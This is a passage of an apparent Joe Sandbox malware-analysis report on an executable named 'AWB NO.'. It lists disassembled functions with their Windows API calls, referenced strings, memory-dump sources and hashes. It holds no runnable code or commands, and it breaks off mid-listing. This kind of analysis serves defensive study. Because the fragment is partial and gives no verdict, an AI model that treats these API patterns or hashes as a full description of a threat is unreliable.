                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$+
                                                              • API String ID: 0-2552117581
                                                              • Opcode ID: 2e4b4dac41d8fa3973813f9136deec8f86e9e125a8cd0ad71ac30a9b71fd4e1d
                                                              • Instruction ID: 37aff8002e02ada0918aa30981c6d68896c3d675e4df38188cf454e749cffd85
                                                              • Opcode Fuzzy Hash: 2e4b4dac41d8fa3973813f9136deec8f86e9e125a8cd0ad71ac30a9b71fd4e1d
                                                              • Instruction Fuzzy Hash: EB513232200215CBCB14DF28D4986FA7BB0EF55310F548067EC80AB3A2D7389C4ACB69
                                                              Function 00462C42 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00462CCB
                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00462D11
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C6890,00000000), ref: 00462D5A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem
                                                              • String ID: 0
                                                              • API String ID: 135850232-4108050209
                                                              • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                              • Instruction ID: 0ba1456fd131f45ac79e83895ae1ccd7d82afcfcc3e6ebc7136bcd4d9a7bd99d
                                                              • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                              • Instruction Fuzzy Hash: F8419130204702AFD720DF25C944B5BB7E4AF85324F14462EF96597291E7B8E904CBAB
                                                              Function 004638AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004638D3,?), ref: 004648C7
                                                                • Part of subcall function 004648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004638D3,?), ref: 004648E0
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004638F3
                                                              • MoveFileW.KERNEL32(?,?), ref: 00463927
                                                              • SHFileOperationW.SHELL32(?), ref: 004639DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$MoveOperationlstrcmpi
                                                              • String ID: \*.*
                                                              • API String ID: 67141772-1173974218
                                                              • Opcode ID: a90d459c768cc163fe9283aa5f59c6cb855b2075852a39a0894f902b4179bc6f
                                                              • Instruction ID: 2b247b45c35498576e4f5c769069253896ee45310ec86603c536ea1ec2fbf65f
                                                              • Opcode Fuzzy Hash: a90d459c768cc163fe9283aa5f59c6cb855b2075852a39a0894f902b4179bc6f
                                                              • Instruction Fuzzy Hash: 7A41A3B15083849AC751EF65D4419DFB7E8AF88345F40082FB489C3261FA79D68CCB5B
                                                              Function 00487648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004876D0
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004876E4
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487708
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 48ced059ccaca18a31bf9734e89f21d61143e7f73e3f118914c4c81aacdb26e5
                                                              • Instruction ID: b11ebb0591133ad0ceca22569c350ac422542bbf5e6f42f70d3245ea3f349615
                                                              • Opcode Fuzzy Hash: 48ced059ccaca18a31bf9734e89f21d61143e7f73e3f118914c4c81aacdb26e5
                                                              • Instruction Fuzzy Hash: 3321AD32500218ABDF119FA4CC42FEF3B69EF48724F210619FA157B1D0DAB9E8559BA4
                                                              Function 00486F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486FAA
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486FBA
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486FDF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 50f4d73c5b6d16030b768c105e68ad76c3469d1e98ef9a13d2c05636ed066bfe
                                                              • Instruction ID: 0ce34a500377e520db2c9b3f5edb2fec5616d4ee1fe5b53d930dc8dde0b0bcbf
                                                              • Opcode Fuzzy Hash: 50f4d73c5b6d16030b768c105e68ad76c3469d1e98ef9a13d2c05636ed066bfe
                                                              • Instruction Fuzzy Hash: 4321D032610118BFDF51AF54DC84EAF37AAEF89754F028529FB049B290CA75EC518BA4
                                                              Function 0046AEAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046AEBF
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046AF13
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046AF6A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume
                                                              • String ID: %lu
                                                              • API String ID: 2507767853-685833217
                                                              • Opcode ID: 642bd0702668cb458e016ff03a319f8e69344c57360f722526e98b7f07afc949
                                                              • Instruction ID: b4b9151bd391a1a00ee024e1154eb3d57cc719af83fa6b4482faf86d322b87cd
                                                              • Opcode Fuzzy Hash: 642bd0702668cb458e016ff03a319f8e69344c57360f722526e98b7f07afc949
                                                              • Instruction Fuzzy Hash: 50217430600109AFCB10EF65C885DAE77B8EF49704B10407EF905EB252DB35EE45CB25
                                                              Function 0045A52F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0045A399
                                                                • Part of subcall function 0045A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A3AC
                                                                • Part of subcall function 0045A37C: GetCurrentThreadId.KERNEL32 ref: 0045A3B3
                                                                • Part of subcall function 0045A37C: AttachThreadInput.USER32(00000000), ref: 0045A3BA
                                                              • GetFocus.USER32 ref: 0045A554
                                                                • Part of subcall function 0045A3C5: GetParent.USER32(?), ref: 0045A3D3
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045A59D
                                                              • EnumChildWindows.USER32(?,0045A615), ref: 0045A5C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                                              • String ID: %s%d
                                                              • API String ID: 2776554818-1110647743
                                                              • Opcode ID: c4eabb98d72f631e76238eaeaa1ec41441e5a8ca6b9faac201d5bfdf75b8b20c
                                                              • Instruction ID: 751a8b7b0c5b57c291529cd136f6623689df8672639a0acf52c1b212b8b34187
                                                              • Opcode Fuzzy Hash: c4eabb98d72f631e76238eaeaa1ec41441e5a8ca6b9faac201d5bfdf75b8b20c
                                                              • Instruction Fuzzy Hash: BA11A5716002086BDF10BF61DC85FEE3778AF48705F14417ABE08AA193DA78595A8B7A
                                                              Function 0048797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004879E1
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004879F6
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487A03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: 7d4f79ef56ba87ecbde27f57f64b9d34404bab4822e94b49ae9255db5ebe1ead
                                                              • Instruction ID: 72fa7abb3685bd86e690d6358780c5c9723b29a5f6cc907360f57c26010fc8b2
                                                              • Opcode Fuzzy Hash: 7d4f79ef56ba87ecbde27f57f64b9d34404bab4822e94b49ae9255db5ebe1ead
                                                              • Instruction Fuzzy Hash: BB112772244208BEEF14AF60CC05FDF37ADEF88764F11492EF601A2190D275D811DB64
                                                              Function 004232AB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,004232EA,00000000,?,00429EFE,000000FF,0000001E,004BBE28,00000008,00429E62,00000000,00000000), ref: 004232BA
                                                              • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 004232CC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 1646373207-1276376045
                                                              • Opcode ID: 93cd9c351f656df620a53593a0fecdf3cf44a48c6cad6142c62bd27fff1c3798
                                                              • Instruction ID: f2ec8cc5f85b6a35da1329bf63ff1170ca148b14a84b909896a5386d5d05271f
                                                              • Opcode Fuzzy Hash: 93cd9c351f656df620a53593a0fecdf3cf44a48c6cad6142c62bd27fff1c3798
                                                              • Instruction Fuzzy Hash: E8D0EC30344208BADB009F91DD15B5E7A68AB00A42F9005BAB804D1590DB699A1496A8
                                                              Function 00404C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404C2E), ref: 00404CA3
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404CB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                              • Instruction ID: 04ac41d75f1c9d427c50c0ff68074fa7ac0788071283bd8ed0c5af36185ae805
                                                              • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                              • Instruction Fuzzy Hash: 77D01270510723CFD720AF31D91874A76D5AF45751F218C3F9885D6690D678D8C4C758
                                                              Function 00404D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404D2E,?,00404F4F,?,004C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404D6F
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404D81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: fc980e23cb8f5420eddcc0b614f2834b55be2bd1e6444ffbd0018dc10b9e249f
                                                              • Instruction ID: 138340c1bb7cbddbf6dc8479dd470e83836704d62684dbb944a4f44490343f19
                                                              • Opcode Fuzzy Hash: fc980e23cb8f5420eddcc0b614f2834b55be2bd1e6444ffbd0018dc10b9e249f
                                                              • Instruction Fuzzy Hash: FED01770610713CFD720AF31D80875A76E8AF55762B218D3FD886E6690E678D8C4CB68
                                                              Function 00404D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404CE1,?), ref: 00404DA2
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404DB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: 5f018ec53565a5f854ca009f39446564a5e562c2ecce425f19b837535b5d9e77
                                                              • Instruction ID: c07e40ce446ef711e38c2592c227d3dcacdcaf999f73730374c34c972243728b
                                                              • Opcode Fuzzy Hash: 5f018ec53565a5f854ca009f39446564a5e562c2ecce425f19b837535b5d9e77
                                                              • Instruction Fuzzy Hash: FCD08270600312CFCB20AF30C808B8A72E4AF04350B208C3FD882E2290E778D8808BA8
                                                              Function 00481072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,004812C1), ref: 00481080
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00481092
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: 5432263b595bc88e73955ff6abb87fff0dce376b2d0410ec06021eb204bdef28
                                                              • Instruction ID: 5e15114a56d8aa9444be57a811800652e6f894b744c13089c9d7ea1a68ee7c5c
                                                              • Opcode Fuzzy Hash: 5432263b595bc88e73955ff6abb87fff0dce376b2d0410ec06021eb204bdef28
                                                              • Instruction Fuzzy Hash: 58D0EC30510712CFD7215B35D81C65B76E8AF05751B118D7FA485D6660D7B8C8C08754
                                                              Function 004793F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00479009,?,0048F910), ref: 00479403
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479415
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: f46959386ec8eaee520539439fd1a652cf0d80df6da373f870bd47e602d76f14
                                                              • Instruction ID: 89bc650762a107f9f6904b3bf3589b9947f4ec562fbb3dff71b805a81f67d5c0
                                                              • Opcode Fuzzy Hash: f46959386ec8eaee520539439fd1a652cf0d80df6da373f870bd47e602d76f14
                                                              • Instruction Fuzzy Hash: AAD0E234654722CFD7209B31D90968B76E5AF05751B21CC3EA48AD6A50E678D8848B68
                                                              Function 004576C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                              • Instruction ID: 5f60346f4440b9fe6298feee7a8cd4ef23557f5833b865c9cfb6b317c071e1ce
                                                              • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                              • Instruction Fuzzy Hash: 35C19E74A04216EFDB14CF94D884EAEB7B5FF48311B1085AAE805EB352D734ED85CBA4
                                                              Function 004783A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 004783D8
                                                              • CoUninitialize.OLE32 ref: 004783E3
                                                                • Part of subcall function 0045DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045DAC5
                                                              • VariantInit.OLEAUT32(?), ref: 004783EE
                                                              • VariantClear.OLEAUT32(?), ref: 004786BF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: 04491ab076417e8035754fc23bd3bb505de74d18f6eeaad5a615c8c0ea867aaf
                                                              • Instruction ID: 78c33319c2be2a516549ee273f6aef3c6ebb19b695401cb4f907ce4bdffe06cf
                                                              • Opcode Fuzzy Hash: 04491ab076417e8035754fc23bd3bb505de74d18f6eeaad5a615c8c0ea867aaf
                                                              • Instruction Fuzzy Hash: 1BA15E75244701AFDB10DF55C485B5AB7E4BF88318F14845EF99AAB3A2CB38ED04CB4A
                                                              Function 0042D812 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00429E4B: EnterCriticalSection.KERNEL32(00000000,?,00429CBC,0000000D), ref: 00429E76
